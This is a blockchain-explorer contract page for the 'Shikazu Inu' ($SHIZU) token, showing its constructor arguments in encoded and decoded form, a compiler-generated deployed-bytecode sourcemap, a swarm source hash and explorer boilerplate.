00000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e00000000000000000000000000000000000000000000000000000000000000012000000000000000000000000f80755a019a43706befdfa8c2c895e223c17d2e10000000000000000000000000000000000000000033b2e3c9fd0803ce8000000000000000000000000000000000000000000000000000000000000000000000b5368696b617a7520496e750000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006245348495a550000000000000000000000000000000000000000000000000000
-----Decoded View---------------
Arg [0] : name_ (string): Shikazu Inu
Arg [1] : symbol_ (string): $SHIZU
Arg [2] : decimals_ (uint8): 18
Arg [3] : whiteshipAddr (address): 0xF80755a019A43706BEfDFa8c2C895e223C17D2e1
Arg [4] : totalSupply_ (uint256): 1000000000000000000000000000
-----Encoded View---------------
9 Constructor Arguments found :
Arg [0] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000e0
Arg [2] : 0000000000000000000000000000000000000000000000000000000000000012
Arg [3] : 000000000000000000000000f80755a019a43706befdfa8c2c895e223c17d2e1
Arg [4] : 0000000000000000000000000000000000000000033b2e3c9fd0803ce8000000
Arg [5] : 000000000000000000000000000000000000000000000000000000000000000b
Arg [6] : 5368696b617a7520496e75000000000000000000000000000000000000000000
Arg [7] : 0000000000000000000000000000000000000000000000000000000000000006
Arg [8] : 245348495a550000000000000000000000000000000000000000000000000000
Deployed Bytecode Sourcemap
13818:5789:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14841:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15876:210;;;;;;:::i;:::-;;:::i;:::-;;;1169:14:1;;1162:22;1144:41;;1132:2;1117:18;15876:210:0;1004:187:1;15142:108:0;15230:12;;15142:108;;;1342:25:1;;;1330:2;1315:18;15142:108:0;1196:177:1;14139:31:0;;;;;;16094:457;;;;;;:::i;:::-;;:::i;15043:91::-;15117:9;;15043:91;;15117:9;;;;1853:36:1;;1841:2;1826:18;15043:91:0;1711:184:1;14181:28:0;;;;;-1:-1:-1;;;;;14181:28:0;;;;;;-1:-1:-1;;;;;2064:32:1;;;2046:51;;2034:2;2019:18;14181:28:0;1900:203:1;15258:177:0;;;;;;:::i;:::-;-1:-1:-1;;;;;15409:18:0;15377:7;15409:18;;;:9;:18;;;;;;;15258:177;5611:94;;;:::i;:::-;;14097:31;;;;;;4960:87;5006:7;5033:6;-1:-1:-1;;;;;5033:6:0;4960:87;;14940:95;;;:::i;16559:401::-;;;;;;:::i;:::-;;:::i;15443:216::-;;;;;;:::i;:::-;;:::i;17747:376::-;;;;;;:::i;:::-;;:::i;15667:201::-;;;;;;:::i;:::-;-1:-1:-1;;;;;15833:18:0;;;15801:7;15833:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;15667:201;5860:192;;;;;;:::i;:::-;;:::i;14841:91::-;14886:13;14919:5;14912:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14841:91;:::o;15876:210::-;15995:4;16017:39;3758:10;16040:7;16049:6;16017:8;:39::i;:::-;-1:-1:-1;16074:4:0;15876:210;;;;;:::o;16094:457::-;16234:4;16251:36;16261:6;16269:9;16280:6;16251:9;:36::i;:::-;16298:221;16321:6;3758:10;16369:139;16425:6;16369:139;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;16369:19:0;;;;;;:11;:19;;;;;;;;3758:10;16369:33;;;;;;;;;;:37;:139::i;:::-;16298:8;:221::i;:::-;-1:-1:-1;16537:4:0;16094:457;;;;;:::o;5611:94::-;5006:7;5033:6;-1:-1:-1;;;;;5033:6:0;3758:10;5180:23;5172:68;;;;-1:-1:-1;;;5172:68:0;;3640:2:1;5172:68:0;;;3622:21:1;;;3659:18;;;3652:30;3718:34;3698:18;;;3691:62;3770:18;;5172:68:0;;;;;;;;;5676:21:::1;5694:1;5676:9;:21::i;:::-;5611:94::o:0;14940:95::-;14987:13;15020:7;15013:14;;;;;:::i;16559:401::-;16679:4;16701:229;3758:10;16751:7;16773:146;16830:15;16773:146;;;;;;;;;;;;;;;;;3758:10;16773:25;;;;:11;:25;;;;;;;;-1:-1:-1;;;;;16773:34:0;;;;;;;;;;;;:38;:146::i;15443:216::-;15565:4;15587:42;3758:10;15611:9;15622:6;15587:9;:42::i;17747:376::-;17045:11;;-1:-1:-1;;;;;17045:11:0;3758:10;-1:-1:-1;;;;;17029:27:0;;17011:77;;;;-1:-1:-1;;;17011:77:0;;4001:2:1;17011:77:0;;;3983:21:1;4040:2;4020:18;;;4013:30;4079:29;4059:18;;;4052:57;4126:18;;17011:77:0;3799:351:1;17011:77:0;17947:13:::1;:30:::0;;-1:-1:-1;;;;;;17947:30:0::1;-1:-1:-1::0;;;;;17947:30:0;::::1;;::::0;;17978:16:::1;:36:::0;;;18015:16:::1;:36:::0;;;18080:35:::1;18015:36:::0;17978;18080:35:::1;:::i;:::-;18063:13;::::0;-1:-1:-1;;;;;18063:13:0::1;18053:24;::::0;;;:9:::1;:24;::::0;;;;:62;-1:-1:-1;;;;17747:376:0:o;5860:192::-;5006:7;5033:6;-1:-1:-1;;;;;5033:6:0;3758:10;5180:23;5172:68;;;;-1:-1:-1;;;5172:68:0;;3640:2:1;5172:68:0;;;3622:21:1;;;3659:18;;;3652:30;3718:34;3698:18;;;3691:62;3770:18;;5172:68:0;3438:356:1;5172:68:0;-1:-1:-1;;;;;5949:22:0;::::1;5941:73;;;::::0;-1:-1:-1;;;5941:73:0;;4662:2:1;5941:73:0::1;::::0;::::1;4644:21:1::0;4701:2;4681:18;;;4674:30;4740:34;4720:18;;;4713:62;-1:-1:-1;;;4791:18:1;;;4784:36;4837:19;;5941:73:0::1;4460:402:1::0;5941:73:0::1;6025:19;6035:8;6025:9;:19::i;:::-;5860:192:::0;:::o;18983:382::-;-1:-1:-1;;;;;19119:19:0;;19111:69;;;;-1:-1:-1;;;19111:69:0;;5069:2:1;19111:69:0;;;5051:21:1;5108:2;5088:18;;;5081:30;5147:34;5127:18;;;5120:62;-1:-1:-1;;;5198:18:1;;;5191:35;5243:19;;19111:69:0;4867:401:1;19111:69:0;-1:-1:-1;;;;;19199:21:0;;19191:69;;;;-1:-1:-1;;;19191:69:0;;5475:2:1;19191:69:0;;;5457:21:1;5514:2;5494:18;;;5487:30;5553:34;5533:18;;;5526:62;-1:-1:-1;;;5604:18:1;;;5597:33;5647:19;;19191:69:0;5273:399:1;19191:69:0;-1:-1:-1;;;;;19273:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;19325:32;;1342:25:1;;;19325:32:0;;1315:18:1;19325:32:0;;;;;;;;18983:382;;;:::o;17126:613::-;-1:-1:-1;;;;;17266:20:0;;17258:71;;;;-1:-1:-1;;;17258:71:0;;5879:2:1;17258:71:0;;;5861:21:1;5918:2;5898:18;;;5891:30;5957:34;5937:18;;;5930:62;-1:-1:-1;;;6008:18:1;;;6001:36;6054:19;;17258:71:0;5677:402:1;17258:71:0;-1:-1:-1;;;;;17348:23:0;;17340:72;;;;-1:-1:-1;;;17340:72:0;;6286:2:1;17340:72:0;;;6268:21:1;6325:2;6305:18;;;6298:30;6364:34;6344:18;;;6337:62;-1:-1:-1;;;6415:18:1;;;6408:34;6459:19;;17340:72:0;6084:400:1;17340:72:0;17505:109;17541:6;17505:109;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;17505:17:0;;;;;;:9;:17;;;;;;;:109;:21;:109::i;:::-;-1:-1:-1;;;;;17485:17:0;;;;;;;:9;:17;;;;;;:129;;;;17648:20;;;;;;;:32;;17673:6;17648:24;:32::i;:::-;-1:-1:-1;;;;;17625:20:0;;;;;;;:9;:20;;;;;;;:55;;;;17696:35;;;;;;;;;;17724:6;1342:25:1;;1330:2;1315:18;;1196:177;11325:240:0;11445:7;11506:12;11498:6;;;;11490:29;;;;-1:-1:-1;;;11490:29:0;;;;;;;;:::i;:::-;-1:-1:-1;;;11541:5:0;;;11325:240::o;6060:173::-;6116:16;6135:6;;-1:-1:-1;;;;;6152:17:0;;;-1:-1:-1;;;;;;6152:17:0;;;;;;6185:40;;6135:6;;;;;;;6185:40;;6116:16;6185:40;6105:128;6060:173;:::o;9046:98::-;9104:7;9131:5;9135:1;9131;:5;:::i;:::-;9124:12;9046:98;-1:-1:-1;;;9046:98:0:o;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:173::-;635:20;;-1:-1:-1;;;;;684:31:1;;674:42;;664:70;;730:1;727;720:12;664:70;567:173;;;:::o;745:254::-;813:6;821;874:2;862:9;853:7;849:23;845:32;842:52;;;890:1;887;880:12;842:52;913:29;932:9;913:29;:::i;:::-;903:39;989:2;974:18;;;;961:32;;-1:-1:-1;;;745:254:1:o;1378:328::-;1455:6;1463;1471;1524:2;1512:9;1503:7;1499:23;1495:32;1492:52;;;1540:1;1537;1530:12;1492:52;1563:29;1582:9;1563:29;:::i;:::-;1553:39;;1611:38;1645:2;1634:9;1630:18;1611:38;:::i;:::-;1601:48;;1696:2;1685:9;1681:18;1668:32;1658:42;;1378:328;;;;;:::o;2108:186::-;2167:6;2220:2;2208:9;2199:7;2195:23;2191:32;2188:52;;;2236:1;2233;2226:12;2188:52;2259:29;2278:9;2259:29;:::i;2299:484::-;2382:6;2390;2398;2406;2459:3;2447:9;2438:7;2434:23;2430:33;2427:53;;;2476:1;2473;2466:12;2427:53;2515:9;2502:23;2568:5;2561:13;2554:21;2547:5;2544:32;2534:60;;2590:1;2587;2580:12;2534:60;2613:5;-1:-1:-1;2637:38:1;2671:2;2656:18;;2637:38;:::i;:::-;2299:484;;2627:48;;-1:-1:-1;;;;2722:2:1;2707:18;;2694:32;;2773:2;2758:18;2745:32;;2299:484::o;2788:260::-;2856:6;2864;2917:2;2905:9;2896:7;2892:23;2888:32;2885:52;;;2933:1;2930;2923:12;2885:52;2956:29;2975:9;2956:29;:::i;:::-;2946:39;;3004:38;3038:2;3027:9;3023:18;3004:38;:::i;:::-;2994:48;;2788:260;;;;;:::o;3053:380::-;3132:1;3128:12;;;;3175;;;3196:61;;3250:4;3242:6;3238:17;3228:27;;3196:61;3303:2;3295:6;3292:14;3272:18;3269:38;3266:161;;3349:10;3344:3;3340:20;3337:1;3330:31;3384:4;3381:1;3374:15;3412:4;3409:1;3402:15;3266:161;;3053:380;;;:::o;4155:127::-;4216:10;4211:3;4207:20;4204:1;4197:31;4247:4;4244:1;4237:15;4271:4;4268:1;4261:15;4287:168;4360:9;;;4391;;4408:15;;;4402:22;;4388:37;4378:71;;4429:18;;:::i;6489:125::-;6554:9;;;6575:10;;;6572:36;;;6588:18;;:::i
Swarm Source
ipfs://4f7f30e992bee39264fb431e51e8ae4eb5d401a57e455f793f794571ff9e81e2
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.